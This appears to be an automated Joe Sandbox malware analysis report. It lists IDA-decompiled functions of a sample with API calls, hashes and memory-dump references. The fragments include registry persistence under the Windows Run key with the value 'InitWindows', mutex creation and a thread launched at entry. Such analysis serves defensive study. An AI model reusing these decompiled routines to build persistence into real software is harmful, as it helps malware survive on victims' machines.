                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 2792853946f7cde7166a60161a6d3a851b268eb431f9f9e60d333b5b8bd7fc10
                                      • Instruction ID: 3b266b1250fa786fe1596b3c455b6e76c31b20ec7ecac400eaba581b7c6fde0f
                                      • Opcode Fuzzy Hash: 2792853946f7cde7166a60161a6d3a851b268eb431f9f9e60d333b5b8bd7fc10
                                      • Instruction Fuzzy Hash: 0FF0B43167412267EF325A69980DB6B3BDDAB71670F848115EF05EA180DA60E80087A1
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0025EF0C, Relevance: 1.5, APIs: 1, Instructions: 28registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E0025EF0C(void** __ecx, short** _a8) {
				int _v8;
				signed int _t8;

				_push(__ecx);
				_v8 = 0;
				_t8 = RegCreateKeyExW(0x80000001,  *_a8, 0, 0, 1, 1, 0, __ecx,  &_v8); // executed
				if(_t8 != 0) {
					return 0;
				}
				return (_t8 & 0xffffff00 | _v8 == 0x00000001) + 1;
			}





                                      0x0025ef0f
                                      0x0025ef24
                                      0x0025ef2c
                                      0x0025ef35
                                      0x00000000
                                      0x0025ef41
                                      0x00000000

                                      APIs
                                      • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000,?,?,?,0025F0F4,?,?), ref: 0025EF2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 05c0dfdf8e30ee0c1618e8664227c03b3af638eea91497535874d02ae6d4f466
                                      • Instruction ID: 60dace52d59162b5eaebde53e449677411e0292a50b01bb4ad927d2f6aad6bf5
                                      • Opcode Fuzzy Hash: 05c0dfdf8e30ee0c1618e8664227c03b3af638eea91497535874d02ae6d4f466
                                      • Instruction Fuzzy Hash: 4FE0DF32522229FFDF248B528D08ECB7E6DEF05BE4F108044F90AA2080C2B18B04D6F0
                                      Uniqueness

                                      Uniqueness Score: 0.16%

                                      Function 0025D75B, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E0025D75B(WCHAR** __ecx, void* __edx, void* __eflags) {
				char _v524;
				WCHAR** _t13;
				void* _t14;

				_t14 = __edx;
				_t13 = __ecx;
				E00251052( &_v524, 0, 0x208);
				__imp__SHGetSpecialFolderPathW(0,  &_v524, _t14, 0); // executed
				E00253412(_t13,  &_v524); // executed
				return _t13;
			}






                                      0x0025d774
                                      0x0025d776
                                      0x0025d778
                                      0x0025d78c
                                      0x0025d79b
                                      0x0025d7a5

                                      APIs
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0025D78C
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$FolderPathSpeciallstrcpy
                                      • String ID:
                                      • API String ID: 1680175942-0
                                      • Opcode ID: b5f5778e0828e54985d1a56d1cf5941d59d3782ec3bb1214896f92fa662308c0
                                      • Instruction ID: 91797d20999aaca9013a476da3681ed92ff746b315b40f17523b94b30eb8f1fd
                                      • Opcode Fuzzy Hash: b5f5778e0828e54985d1a56d1cf5941d59d3782ec3bb1214896f92fa662308c0
                                      • Instruction Fuzzy Hash: D3E0927570031867DB60A6159C0EF87776C8BC0711F000171BA58E21C1E9B09A598AA0
                                      Uniqueness

                                      Uniqueness Score: 0.51%

                                      Function 0025D425, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 87%
                                      			E0025D425(signed int* __ecx) {
				char _v8;
				WCHAR* _t3;
				void* _t5;
				signed int* _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t3 = E00255ADB(0x7d0);
				 *__ecx =  *__ecx & 0x00000000;
				_t18 = _t3;
				GetModuleFileNameW(0, _t3, 0x3e8);
				_t5 = E00253412( &_v8, _t18); // executed
				E00253264(_t15, _t5); // executed
				E00255A2D(_v8);
				return _t15;
			}







                                      0x0025d428
                                      0x0025d42b
                                      0x0025d432
                                      0x0025d437
                                      0x0025d43a
                                      0x0025d444
                                      0x0025d44e
                                      0x0025d456
                                      0x0025d45e
                                      0x0025d468

                                      APIs
                                        • Part of subcall function 00255ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0025E415,?,?,00000000,002555C4,?,?,00000000), ref: 00255ADE
                                        • Part of subcall function 00255ADB: HeapAlloc.KERNEL32(00000000,?,00000000,002555C4,?,?,00000000), ref: 00255AE5
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0025F41F,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0025D444
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heaplstrcpylstrlen$AllocFileFreeModuleNameProcessVirtual
                                      • String ID:
                                      • API String ID: 1499825812-0
                                      • Opcode ID: b2e5cb7714318475df7bb050d58939956f4b7da310133145c4c95f5e42dce553
                                      • Instruction ID: 9d795b3aaf021ff0f47034b83c73fa63da6eb3258a3b4c466d5fd69da9ea76ce
                                      • Opcode Fuzzy Hash: b2e5cb7714318475df7bb050d58939956f4b7da310133145c4c95f5e42dce553
                                      • Instruction Fuzzy Hash: A4E0DF72714110A7D704B359EC57BAE766DCFC13A3F100025FA0AE21C2DEB05E188AA4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00253001, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00253001(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
				short _v1028;
				WCHAR** _t14;
				WCHAR** _t15;

				_t15 = __edx;
				_t14 = __ecx;
				E00251052( &_v1028, 0, 0x400);
				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
				E00253412(_t14,  &_v1028); // executed
				return _t14;
			}






                                      0x0025301a
                                      0x0025301c
                                      0x0025301e
                                      0x00253034
                                      0x00253043
                                      0x0025304d

                                      APIs
                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00253034
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                      • String ID:
                                      • API String ID: 1709970682-0
                                      • Opcode ID: e226500d08d56346db7393b660d0d09c66593b83293a03f81a1c5200475181cd
                                      • Instruction ID: 60ad3c6e23efc2ea63549a8281b7529fd9e057f466ee75fabaa31636796b5a4a
                                      • Opcode Fuzzy Hash: e226500d08d56346db7393b660d0d09c66593b83293a03f81a1c5200475181cd
                                      • Instruction Fuzzy Hash: 96E0D8B660011867DB20E6159C06F9677ACEBC0308F0500B5BB08F31C0E9B0DE1E8AA8
                                      Uniqueness

                                      Uniqueness Score: 0.14%

                                      Function 00253162, Relevance: 1.5, APIs: 1, Instructions: 25stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00253162(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
				void* _t4;
				WCHAR* _t6;
				WCHAR** _t8;
				WCHAR** _t14;

				_t14 = _a4;
				_t8 = __ecx;
				_t4 = E0025308E(_t14);
				_t6 = E002559CE( *((intOrPtr*)(__ecx)), 4 + (_t4 + E0025308E(__ecx)) * 2); // executed
				 *_t8 = _t6;
				return lstrcatW(_t6,  *_t14);
			}







                                      0x00253168
                                      0x0025316b
                                      0x0025316f
                                      0x00253188
                                      0x0025318d
                                      0x0025319c

                                      APIs
                                        • Part of subcall function 0025308E: lstrlenW.KERNEL32(?,00253473,?,?,?,0025F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00253095
                                      • lstrcatW.KERNEL32(00000000,?), ref: 00253192
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1475610065-0
                                      • Opcode ID: b65508ba825fbd4d08f17a83274e36a4546fea43c2db72e16ae0492c3e6ebeb6
                                      • Instruction ID: d8fdddb2bf7ce040596dbd25e508485b47bae7a0193e2cfca411c280700ae60f
                                      • Opcode Fuzzy Hash: b65508ba825fbd4d08f17a83274e36a4546fea43c2db72e16ae0492c3e6ebeb6
                                      • Instruction Fuzzy Hash: 03E026322003109BCB11AB66EC8886EBB9EEF853B1700003AFD05C7214EA715C24CAE4
                                      Uniqueness

                                      Uniqueness Score: 1.37%

                                      Function 0025EFCB, Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025EFCB(void** __ecx, short** _a4, char** _a8, int _a12) {
				long _t8;
				void* _t13;

				_t13 =  *__ecx;
				if(_t13 == 0) {
					L3:
					return 0;
				}
				_t8 = RegSetValueExW(_t13,  *_a4, 0, _a12,  *_a8, _a8[1]); // executed
				if(_t8 != 0) {
					goto L3;
				}
				return _t8 + 1;
			}





                                      0x0025efcf
                                      0x0025efd3
                                      0x0025eff7
                                      0x00000000
                                      0x0025eff7
                                      0x0025efea
                                      0x0025eff2
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,0025F239,?,00000000,?,00000001,?,?,?), ref: 0025EFEA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: 918af23dde86b9c18d35ee9ca00ca9adc37c3105e34c536a252b057a0c5f8e09
                                      • Instruction ID: 3b4c0a39776f8c9a407680f8d003d898de0db11c24a2bdd9b1892288c6aaf495
                                      • Opcode Fuzzy Hash: 918af23dde86b9c18d35ee9ca00ca9adc37c3105e34c536a252b057a0c5f8e09
                                      • Instruction Fuzzy Hash: ECE0DF32220125AFDB04CF84DC40EA6B7A8EF49740B158048FD11CB260D670ED20DB94
                                      Uniqueness

                                      Uniqueness Score: 0.20%

                                      Function 0025DD40, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025DD40(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr* _t10;

				_t10 = __ecx;
				E00252F52(__ecx + 4, _a4); // executed
				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
				return 1;
			}




                                      0x0025dd48
                                      0x0025dd4d
                                      0x0025dd61
                                      0x0025dd69

                                      APIs
                                        • Part of subcall function 00252F52: lstrcatA.KERNEL32(00000000,?,?,00000000,?,002533F1,00000000,00000000,?,00254AC0,?,?,?,?,?), ref: 00252F7E
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 0025DD5B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEventlstrcat
                                      • String ID:
                                      • API String ID: 2275612694-0
                                      • Opcode ID: 3785c475ba6f5ab1030d9dfc545746098fb8fb2231c3a7e1a4dc380ab8f2be47
                                      • Instruction ID: dce08418dad520e612dda8a76bf848fb166020c02c4707a854310b3666b413c6
                                      • Opcode Fuzzy Hash: 3785c475ba6f5ab1030d9dfc545746098fb8fb2231c3a7e1a4dc380ab8f2be47
                                      • Instruction Fuzzy Hash: D6D05E32248205BBD710AB91EC06F86BF69FB62761F008026F65996590DBB1A839CB90
                                      Uniqueness

                                      Uniqueness Score: 1.31%

                                      Function 00260E1E, Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			_entry_(char _a8) {

				_t1 =  &_a8;
				 *_t1 = _a8 - 1;
				if( *_t1 == 0) {
					CreateThread(0, 0, E0025586A, 0, 0, 0); // executed
				}
				return 1;
			}



                                      0x00260e21
                                      0x00260e21
                                      0x00260e25
                                      0x00260e33
                                      0x00260e33
                                      0x00260e3d

                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,0025586A,00000000,00000000,00000000), ref: 00260E33
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: d3824833ca58249ae9a295fe4edcfc4f8ad7b3c46c34e3eaee0c3bae21a99edd
                                      • Instruction ID: c3b6d3e49cc02c17c1d5d2c3f6c60b87a61936399e9adb24d4708ba266183265
                                      • Opcode Fuzzy Hash: d3824833ca58249ae9a295fe4edcfc4f8ad7b3c46c34e3eaee0c3bae21a99edd
                                      • Instruction Fuzzy Hash: 0EC08CB1560228FEBB045BB22C0CC3773DCDB31212700C820FC01C2440D579CC688A30
                                      Uniqueness

                                      Uniqueness Score: 0.06%

                                      Function 0025E236, Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025E236(void** __ecx) {
				void* _t5;
				void** _t10;

				_t10 = __ecx;
				_t5 = CreateMutexA(0, 0, 0); // executed
				 *_t10 = _t5;
				_t10[1] = 0 | _t5 != 0xffffffff;
				return _t10;
			}





                                      0x0025e239
                                      0x0025e23e
                                      0x0025e246
                                      0x0025e250
                                      0x0025e254

                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0025DE7C,?,?,0025E3F7,?,?,00000000,002555C4,?,?,00000000), ref: 0025E23E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateMutex
                                      • String ID:
                                      • API String ID: 1964310414-0
                                      • Opcode ID: f283009218e93767c700cb456f65d4719c06e35c9bd0e2775c2357e8537ac8ad
                                      • Instruction ID: e17c9865a47832bcd4984c63c0c3f08638e6e3d28c62249c0a0e7875285d2b84
                                      • Opcode Fuzzy Hash: f283009218e93767c700cb456f65d4719c06e35c9bd0e2775c2357e8537ac8ad
                                      • Instruction Fuzzy Hash: 69D012B15045205FE3249F395C08967B5DDDF99720315CE29B4A9C71D4E5708C448760
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0025510D, Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E0025510D(void** __ecx, void* __eflags) {
				int _t7;
				void* _t12;
				void* _t13;

				__imp__#116(_t13); // executed
				E0025E221( &(__ecx[0x76]));
				E00252E66( &(__ecx[0xc]));
				E00252E66( &(__ecx[4]));
				_t12 =  *__ecx;
				_t7 = VirtualFree(_t12, 0, 0x8000); // executed
				return _t7;
			}






                                      0x00255110
                                      0x0025511c
                                      0x00255124
                                      0x0025512c
                                      0x00255131
                                      0x00255a35
                                      0x00255a3b

                                      APIs
                                      • WSACleanup.WS2_32 ref: 00255110
                                        • Part of subcall function 0025E221: ReleaseMutex.KERNEL32(?,?,0025DE9B,?,00255774,?,00000000,00000000,00000000,00000000,?,0000000A,?,?,00000000,.bss), ref: 0025E226
                                        • Part of subcall function 0025E221: CloseHandle.KERNEL32(?), ref: 0025E22E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CleanupCloseHandleMutexRelease
                                      • String ID:
                                      • API String ID: 708017517-0
                                      • Opcode ID: ec3f3db3678bfe487c4c77c5cdb1ba08b8eefcc3d2f6e6004d496aa461777bd5
                                      • Instruction ID: 674bca53c2b1a096dbd09302dfacdae84acd6c96ceff825951fe770230bd7b3f
                                      • Opcode Fuzzy Hash: ec3f3db3678bfe487c4c77c5cdb1ba08b8eefcc3d2f6e6004d496aa461777bd5
                                      • Instruction Fuzzy Hash: F7D09E31030611CBC328EB20E8668D9B364BF15701750092D9883525929F74BA1DCB44
                                      Uniqueness

                                      Uniqueness Score: 1.47%

                                      Function 0025DBF3, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 50%
                                      			E0025DBF3(void* __ecx) {
				char _v8;
				signed int _t4;

				_push(__ecx);
				_v8 = GetCurrentProcess();
				_t4 = E0025EBD4( &_v8); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}





                                      0x0025dbf6
                                      0x0025dc00
                                      0x0025dc03
                                      0x0025dc0a
                                      0x0025dc0f

                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,00252BBD,?,00262608,?,?,00000000,?,?,?), ref: 0025DBF7
                                        • Part of subcall function 0025EBD4: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EBE9
                                        • Part of subcall function 0025EBD4: GetProcAddress.KERNEL32(00000000,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EBF0
                                        • Part of subcall function 0025EBD4: IsWow64Process.KERNEL32(?,00000000,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EC00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleModuleProcWow64
                                      • String ID:
                                      • API String ID: 1745181078-0
                                      • Opcode ID: d50689651cd29f6aefb24ce2fc75f34eb17b0e308d80894e986dd5cf48f7f957
                                      • Instruction ID: cbcc311c9a79e6e354d5dde439079dd9800875e3419a57a1ef96f5bdb11f4213
                                      • Opcode Fuzzy Hash: d50689651cd29f6aefb24ce2fc75f34eb17b0e308d80894e986dd5cf48f7f957
                                      • Instruction Fuzzy Hash: E9C08C3086030EEBCF04ABB4D90985D77A8AB102497004664E403D3190EE70EB0C8A81
                                      Uniqueness

                                      Uniqueness Score: 0.43%

                                      Function 0025EF4C, Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025EF4C(void** __ecx) {
				long _t1;
				signed int* _t3;

				_t3 = __ecx;
				if( *__ecx != 0) {
					_t1 = RegCloseKey( *__ecx); // executed
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t1;
			}





                                      0x0025ef4d
                                      0x0025ef52
                                      0x0025ef56
                                      0x0025ef56
                                      0x0025ef5c
                                      0x0025ef60

                                      APIs
                                      • RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 9c08ce64840cda9a263c06dd3486a9b478d0dc7a7ea8931613eda593a98dab5c
                                      • Instruction ID: b1c03d5bf9efcbf0f84d18c77c461ad9f9a6c9844882edf11a6a423106012645
                                      • Opcode Fuzzy Hash: 9c08ce64840cda9a263c06dd3486a9b478d0dc7a7ea8931613eda593a98dab5c
                                      • Instruction Fuzzy Hash: B3C04C31425221CBD7361F14F4187917BE5AB14312F25045ED4C155064D7B50CD4CA44
                                      Uniqueness

                                      Uniqueness Score: 0.09%

                                      Function 0025D70F, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0025D715
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID:
                                      • API String ID: 4241100979-0
                                      • Opcode ID: fb3f43e4886ea04a7b1e38da45b18e00e01b36edd8e296549fb9fe516a6c0ff7
                                      • Instruction ID: 065d5dad34263c6b25590eecdd9ef948e5b9bb249467c320ab9f6b85767a03df
                                      • Opcode Fuzzy Hash: fb3f43e4886ea04a7b1e38da45b18e00e01b36edd8e296549fb9fe516a6c0ff7
                                      • Instruction Fuzzy Hash: ACB012303F424097DB001B709C1AF1437149742B07F204260F112D80F4C6D100455501
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 002559AA, Relevance: 1.3, APIs: 1, Instructions: 17memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E002559AA(long __ecx) {
				void* _t1;
				long _t7;
				void* _t8;

				_t7 = __ecx;
				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				_t8 = _t1;
				E00255AB9(_t8, _t7);
				return _t8;
			}






                                      0x002559b3
                                      0x002559b8
                                      0x002559be
